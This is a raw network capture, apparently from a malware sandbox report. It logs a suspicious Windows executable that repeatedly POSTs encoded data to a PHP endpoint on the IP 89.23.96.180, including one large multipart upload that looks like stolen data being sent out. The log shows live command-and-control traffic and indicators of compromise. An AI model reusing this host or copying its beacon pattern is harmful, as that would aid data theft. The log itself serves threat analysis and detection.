Dec 21, 2024 10:02:42.900325060 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Dec 2024 09:02:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 4<V@[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49767	89.23.96.180	80	5148	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe

Timestamp	Bytes transferred	Direction	Data
Dec 21, 2024 10:02:43.161135912 CET	404	OUT	POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 89.23.96.180 Content-Length: 2532 Expect: 100-continue Connection: Keep-Alive
Dec 21, 2024 10:02:43.515368938 CET	2532	OUT	Data Raw: 58 5e 43 55 5d 57 52 52 55 5e 55 5a 54 5b 50 57 57 52 5c 5c 52 54 51 5b 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c Data Ascii: X^CU]WRRU^UZT[PWWR\\RTQ[ZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_ @98R&)6-?#'098#-Z2('+<[7!_.#Q,.
Dec 21, 2024 10:02:44.546890020 CET	25	IN	HTTP/1.1 100 Continue
Dec 21, 2024 10:02:44.780072927 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Dec 2024 09:02:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 4<V@[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49774	89.23.96.180	80	5148	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe

Timestamp	Bytes transferred	Direction	Data
Dec 21, 2024 10:02:45.313062906 CET	404	OUT	POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 89.23.96.180 Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49778	89.23.96.180	80	5148	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe

Timestamp	Bytes transferred	Direction	Data
Dec 21, 2024 10:02:45.561671972 CET	404	OUT	POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 89.23.96.180 Content-Length: 2112 Expect: 100-continue Connection: Keep-Alive
Dec 21, 2024 10:02:45.911245108 CET	2112	OUT	Data Raw: 58 5f 43 56 5d 56 52 57 55 5e 55 5a 54 52 50 51 57 53 5c 5a 52 52 51 56 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c Data Ascii: X_CV]VRWU^UZTRPQWS\ZRRQVZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_ :2 R&-)29-/0',,;!R#/-Z%2V+'>> ^5!_.#Q,
Dec 21, 2024 10:02:46.941054106 CET	25	IN	HTTP/1.1 100 Continue
Dec 21, 2024 10:02:47.242355108 CET	349	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Dec 2024 09:02:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 39 38 0d 0a 0e 1e 39 1e 23 3b 03 1c 2b 39 3f 58 28 3f 0b 0e 29 3e 36 5c 2f 31 30 06 22 02 3e 5b 3e 03 23 5a 27 00 2f 59 36 29 35 59 21 06 20 00 3e 1b 2e 58 01 1e 21 06 23 0d 03 11 33 01 37 1e 2a 19 03 04 3c 00 2a 5d 24 01 24 09 24 2a 24 1b 3d 2a 28 1e 32 3d 07 03 2c 06 33 1d 3c 00 0e 57 33 36 2b 51 03 1e 26 5d 32 02 06 0a 26 23 22 01 25 07 39 5f 23 00 33 52 29 5e 28 0f 37 3b 35 07 2f 3a 20 16 3c 3e 21 02 2a 16 29 01 24 05 3f 52 25 14 23 54 2d 00 2c 48 00 31 5d 56 0d 0a 30 0d 0a 0d 0a Data Ascii: 989#;+9?X(?)>6\/10">[>#Z'/Y6)5Y! >.X!#37<]$$$$=(2=,3<W36+Q&]2&#"%9_#3R)^(7;5/: <>!*)$?R%#T-,H1]V0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	49779	89.23.96.180	80	5148	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe

Timestamp	Bytes transferred	Direction	Data
Dec 21, 2024 10:02:46.147713900 CET	404	OUT	POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 89.23.96.180 Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Dec 21, 2024 10:02:46.499732971 CET	2536	OUT	Data Raw: 5d 55 46 57 5d 56 52 54 55 5e 55 5a 54 5f 50 5d 57 53 5c 5f 52 52 51 5e 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c Data Ascii: ]UFW]VRTU^UZT_P]WS\_RRQ^ZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_ .(S1=>*"59,3%/,,(=P ,92)?$4?(^>!_.#Q,6
Dec 21, 2024 10:02:47.524369955 CET	25	IN	HTTP/1.1 100 Continue
Dec 21, 2024 10:02:47.764211893 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Dec 2024 09:02:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 4<V@[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	49785	89.23.96.180	80	5148	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe

Timestamp	Bytes transferred	Direction	Data
Dec 21, 2024 10:02:48.053894997 CET	380	OUT	POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 89.23.96.180 Content-Length: 2536 Expect: 100-continue
Dec 21, 2024 10:02:48.407465935 CET	2536	OUT	Data Raw: 5d 55 43 56 58 5b 57 51 55 5e 55 5a 54 5f 50 51 57 5b 5c 5a 52 57 51 58 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c Data Ascii: ]UCVX[WQU^UZT_PQW[\ZRWQXZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_ 9<R1=-P9\:?+0/:.4Y=\1([<[8[)!_.#Q,6
Dec 21, 2024 10:02:49.437274933 CET	25	IN	HTTP/1.1 100 Continue
Dec 21, 2024 10:02:49.672646046 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Dec 2024 09:02:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 4<V@[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	49791	89.23.96.180	80	5148	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe

Timestamp	Bytes transferred	Direction	Data
Dec 21, 2024 10:02:49.941368103 CET	380	OUT	POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 89.23.96.180 Content-Length: 2536 Expect: 100-continue
Dec 21, 2024 10:02:50.296624899 CET	2536	OUT	Data Raw: 58 54 43 57 5d 5c 57 56 55 5e 55 5a 54 5e 50 5c 57 52 5c 5b 52 55 51 5b 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c Data Ascii: XTCW]\WVU^UZT^P\WR\[RUQ[ZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_#92$%=6>-?_$?(.;:7,>%2P?$7(_)!_.#Q,2
Dec 21, 2024 10:02:51.318923950 CET	25	IN	HTTP/1.1 100 Continue
Dec 21, 2024 10:02:51.552298069 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Dec 2024 09:02:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 4<V@[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.5	49794	89.23.96.180	80	5148	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe

Timestamp	Bytes transferred	Direction	Data
Dec 21, 2024 10:02:51.894328117 CET	404	OUT	POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 89.23.96.180 Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Dec 21, 2024 10:02:52.249752045 CET	2536	OUT	Data Raw: 58 53 43 52 58 5b 57 56 55 5e 55 5a 54 52 50 57 57 5a 5c 5f 52 50 51 5f 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c Data Ascii: XSCRX[WVU^UZTRPWWZ\_RPQ_ZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_#:8$.9Q>&., $?,: &1?8?-,Z>5!_.#Q,

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.5	49798	89.23.96.180	80	5148	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe

Timestamp	Bytes transferred	Direction	Data
Dec 21, 2024 10:02:52.370276928 CET	404	OUT	POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 89.23.96.180 Content-Length: 2100 Expect: 100-continue Connection: Keep-Alive
Dec 21, 2024 10:02:52.718543053 CET	2100	OUT	Data Raw: 5d 51 43 5f 58 5b 57 53 55 5e 55 5a 54 5b 50 52 57 5b 5c 58 52 56 51 59 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c Data Ascii: ]QC_X[WSU^UZT[PRW[\XRVQYZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_ B,11-W?!-/\0.R &!=+7>->!_.#Q,
Dec 21, 2024 10:02:53.746490002 CET	25	IN	HTTP/1.1 100 Continue
Dec 21, 2024 10:02:53.980130911 CET	349	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Dec 2024 09:02:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 39 38 0d 0a 0e 1e 3a 0b 37 15 3e 0b 29 29 37 12 2a 3c 39 0d 2a 58 22 5d 2e 32 30 06 22 12 29 03 3d 04 2b 5e 27 3d 27 5b 22 14 39 13 22 2f 30 03 3e 31 2e 58 01 1e 21 08 23 0d 35 55 24 06 3f 55 3d 09 2a 5b 2b 10 00 58 27 01 28 0e 25 5c 3c 59 3d 2a 2c 50 25 13 39 01 3b 11 0d 5e 3c 00 2c 54 24 26 2b 51 03 1e 25 05 26 05 3f 1e 26 0d 22 02 25 2e 22 01 22 2e 24 0e 29 3b 33 1a 23 15 3a 17 3b 17 20 15 28 3d 26 59 3d 06 3d 00 30 3f 37 55 32 3e 23 54 2d 00 2c 48 00 31 5d 56 0d 0a 30 0d 0a 0d 0a Data Ascii: 98:7>))7<9X"].20")=+^'='["9"/0>1.X!#5U$?U=[+X'(%\<Y=,P%9;^<,T$&+Q%&?&"%."".$);3#:; (=&Y==0?7U2>#T-,H1]V0
Dec 21, 2024 10:02:53.980467081 CET	426	OUT	POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----B9co6awbhp0NMn6zd75TICxIjElnpRVpUq User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 89.23.96.180 Content-Length: 124462 Expect: 100-continue
Dec 21, 2024 10:02:54.327996969 CET	14832	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 39 63 6f 36 61 77 62 68 70 30 4e 4d 6e 36 7a 64 37 35 54 49 43 78 49 6a 45 6c 6e 70 52 56 70 55 71 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 30 22 Data Ascii: ------B9co6awbhp0NMn6zd75TICxIjElnpRVpUqContent-Disposition: form-data; name="0"Content-Type: text/plainX_CSX]W^U^UZT_PRWX\TR_Q[ZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X
Dec 21, 2024 10:02:54.439095974 CET	25	IN	HTTP/1.1 100 Continue
Dec 21, 2024 10:02:54.447727919 CET	4944	OUT	Data Raw: 64 7a 66 33 6d 5a 6f 36 66 45 48 54 42 58 54 69 47 52 2f 6a 62 52 76 45 56 4b 42 68 42 41 43 61 33 4c 5a 46 4f 49 61 31 51 46 6a 43 31 39 56 70 6e 71 6e 32 52 78 49 72 50 50 42 64 45 41 5a 6c 41 74 63 42 75 58 52 6a 65 7a 71 2b 33 31 42 69 56 5a Data Ascii: dzf3mZo6fEHTBXTiGR/jbRvEVKBhBACa3LZFOIa1QFjC19Vpnqn2RxIrPPBdEAZlAtcBuXRjezq+31BiVZ32CIc4quulPJcC98HTBAbileI/xhtSnlUXFUIBSvEeOQ3gVd/KKRKAyI/lgUuv/erMcdPR23nfvLfY9mvk9+8yzx2xHyi3r0nwrJo0NjdKvszGiWzkHNzY+lPPmS39nL2lcNV7jN8RXA5dMmZWZY8WogIMLDY5diZ
Dec 21, 2024 10:02:54.447814941 CET	2472	OUT	Data Raw: 6d 77 6e 78 51 66 6a 48 71 72 52 76 53 6c 7a 31 52 55 63 6c 66 33 50 4a 74 74 78 35 78 31 74 68 39 46 55 47 69 50 55 47 47 4f 66 79 61 6b 73 2f 76 67 2f 4a 71 79 75 74 72 77 37 78 2f 53 72 31 49 54 75 71 4f 64 7a 59 50 66 78 4f 61 71 6c 47 32 6d Data Ascii: mwnxQfjHqrRvSlz1RUclf3PJttx5x1th9FUGiPUGGOfyaks/vg/Jqyutrw7x/Sr1ITuqOdzYPfxOaqlG2mwqriGC+dTP2wuT/BUfPsR1BikepmJkQMdy2jfGKoYE0DeGYf/wkoDoyyRg+mH7fJDfQ4e/zqLFvNVxnIKx500ehYcj2BTQX53cGQ11BAj9mo87Sj+oTN0X3b2e5mbwyKNEnDUw50XBysWVgTfLv95f1DifVB4hv73
Dec 21, 2024 10:02:54.447879076 CET	2472	OUT	Data Raw: 56 34 57 32 42 72 50 54 4a 7a 6b 65 65 36 6d 62 6c 2b 74 72 2b 6f 37 55 38 77 33 34 55 31 4d 62 78 4c 51 7a 49 57 2b 6b 7a 7a 34 57 30 58 74 79 47 2f 71 69 74 65 79 65 64 72 65 77 65 63 55 34 5a 75 5a 47 7a 4e 56 38 69 63 71 48 49 6b 6c 58 34 68 Data Ascii: V4W2BrPTJzkee6mbl+tr+o7U8w34U1MbxLQzIW+kzz4W0XtyG/qiteyedrewecU4ZuZGzNV8icqHIklX4hIXf0aWbByG/07/3M1i1Ce1K5C3tBsz/hXiHdfEILoaMt2GX03uzuW71pYZ19mudLjIJbS8Kxf++LZa/u2xxXOVER09crpaMaXsWhGIyqrS7oBVi9KUm9k31q9gRbZZhb7fPRQfrQpY6i9mf5TUIha1buch+aJzKqL
Dec 21, 2024 10:02:54.447928905 CET	2472	OUT	Data Raw: 57 36 55 35 42 32 6f 4c 39 53 4a 57 66 4e 4c 66 4f 71 63 54 72 44 32 53 69 61 4a 35 2f 67 65 32 6f 6a 4f 43 55 32 74 66 31 62 33 33 4d 38 56 6c 4f 38 39 32 4f 41 37 36 54 4c 2f 43 67 77 51 73 6f 57 63 79 35 49 77 6d 41 31 39 6f 79 4c 59 49 67 76 Data Ascii: W6U5B2oL9SJWfNLfOqcTrD2SiaJ5/ge2ojOCU2tf1b33M8VlO892OA76TL/CgwQsoWcy5IwmA19oyLYIgvslL1Bz+FnNQAuVb39GaPBw4MslLdpaQg5BArKqRQNrq1LnrmBEDKSoDRz097uTgGE8pdHBQCQwF73GBOHUUFzXSaFvQbyMalvHr+rs9QWqUAvtt4i7oK7LHXCocBXAMXLctdxbjMwoGKSSKx/yMRsnIvn7OjlpD8v
Dec 21, 2024 10:02:54.447967052 CET	2472	OUT	Data Raw: 6b 38 48 70 52 2b 37 65 75 6d 64 62 6f 45 6f 57 72 77 51 32 2b 77 51 68 42 74 59 76 70 6d 6c 41 49 49 4f 54 30 65 73 38 68 45 52 61 55 46 41 6b 6a 42 78 68 71 4d 6c 46 4f 2f 49 77 4e 50 67 63 39 44 45 4a 62 4f 31 49 35 4f 43 34 61 52 61 44 78 6f Data Ascii: k8HpR+7eumdboEoWrwQ2+wQhBtYvpmlAIIOT0es8hERaUFAkjBxhqMlFO/IwNPgc9DEJbO1I5OC4aRaDxoqeJs103SJzFnLLGtSZVOIzUAEk4KQhMH16iGE1A4NaSGdM3OcNgtE3we6rki35K1Vz2qLvl9PM9fXsVSJe88j6oItkNpsF4U953V+ZXzWFWaMSGyealAq+fdimyUeUpI7+TZCi7vBfgbaiaG7GZ+lg/9cEQm6ciwJ
Dec 21, 2024 10:02:54.448112965 CET	7416	OUT	Data Raw: 70 51 52 5a 6d 39 53 61 34 4c 74 54 68 4d 6a 52 78 79 67 35 64 6f 70 62 2b 72 31 39 55 4b 53 71 48 2f 31 6e 54 66 52 47 72 68 72 54 36 59 51 68 4d 61 75 4c 7a 59 68 31 67 52 65 44 4c 53 59 44 73 47 62 6b 78 54 66 6e 70 55 75 2f 39 2f 53 6c 4d 30 Data Ascii: pQRZm9Sa4LtThMjRxyg5dopb+r19UKSqH/1nTfRGrhrT6YQhMauLzYh1gReDLSYDsGbkxTfnpUu/9/SlM0wzaOy+IwIsY7Ly1/t2eYbmOEWLizyYF33sDNx2/MI/sFnyXTrRVnjkeZsloR7/o4qFFcnv9sOzbzDq6luMr0stX7n8dwrswwfDmQOJ/iM9+XmZetbtreyRIcvBRlwaqcsRN512iybsqwTwmsHGl1U47U8+DqK2Z+D
Dec 21, 2024 10:02:54.448154926 CET	2472	OUT	Data Raw: 55 6c 69 43 6a 30 6a 4a 6f 2f 61 47 75 59 4c 7a 6b 6c 50 34 62 41 58 70 33 2f 74 55 59 53 64 35 77 78 68 64 64 70 4a 37 69 73 39 38 6f 71 6e 56 2b 57 50 35 7a 6a 63 2b 5a 7a 6f 39 34 65 6b 64 47 6f 30 72 64 58 4f 74 41 78 65 47 67 2b 73 4b 37 35 Data Ascii: UliCj0jJo/aGuYLzklP4bAXp3/tUYSd5wxhddpJ7is98oqnV+WP5zjc+Zzo94ekdGo0rdXOtAxeGg+sK75XkqF9Qu84r5XS1Md4s4aeptSEqraBAzvCIkUOusTdJ4IW5hjkh4OcciBUHylMt2GNLleNKBwmtKGAq1wQCaP7NKR7nD3tQgugTCF+QVh2DHwis8P/2jSEXt9VcoORALErqwiNHVwTO8O+b0PBykAaSQj4rKd14Bdo
Dec 21, 2024 10:02:54.448242903 CET	4944	OUT	Data Raw: 41 48 55 78 74 71 49 6b 51 31 6a 6c 36 75 77 64 72 6c 62 54 50 42 72 50 54 68 6a 57 69 78 32 58 56 2f 52 32 64 4f 4c 4b 2f 49 38 56 47 2b 51 63 38 36 5a 66 65 67 50 54 62 66 50 30 61 78 35 4a 52 4f 42 58 6c 6b 5a 6b 32 2b 38 78 76 6e 72 4d 47 47 Data Ascii: AHUxtqIkQ1jl6uwdrlbTPBrPThjWix2XV/R2dOLK/I8VG+Qc86ZfegPTbfP0ax5JROBXlkZk2+8xvnrMGGH5m4FrAPrsvuiiaRw28p7GT8bvN4acL9DfdZztSPCSmuBx/9x8dDDIm38bzbL+3Xuz6ZlP/6Kee30ROquFTvXSM9rDTq8D0w4nKRFXlCuj6usqk2GtzaPod/mwRtvS56WGxjnmVfiHhx2Bn9r//BZT9ycwr+g8EO/
Dec 21, 2024 10:02:55.337810040 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Dec 2024 09:02:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 4<V@[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.5	49799	89.23.96.180	80	5148	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe

Timestamp	Bytes transferred	Direction	Data
Dec 21, 2024 10:02:52.507416964 CET	404	OUT	POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 89.23.96.180 Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Dec 21, 2024 10:02:52.859112024 CET	2536	OUT	Data Raw: 58 56 43 50 58 5d 52 53 55 5e 55 5a 54 58 50 57 57 5d 5c 5f 52 57 51 56 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c Data Ascii: XVCPX]RSU^UZTXPWW]\_RWQVZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_ D.!W$=P>29?'U-8>7<=&!V<$3?.$=!_.#Q,*
Dec 21, 2024 10:02:53.884541988 CET	25	IN	HTTP/1.1 100 Continue
Dec 21, 2024 10:02:54.127334118 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Dec 2024 09:02:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 4<V@[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.5	49805	89.23.96.180	80	5148	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe

Timestamp	Bytes transferred	Direction	Data
Dec 21, 2024 10:02:54.379646063 CET	380	OUT	POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 89.23.96.180 Content-Length: 2536 Expect: 100-continue
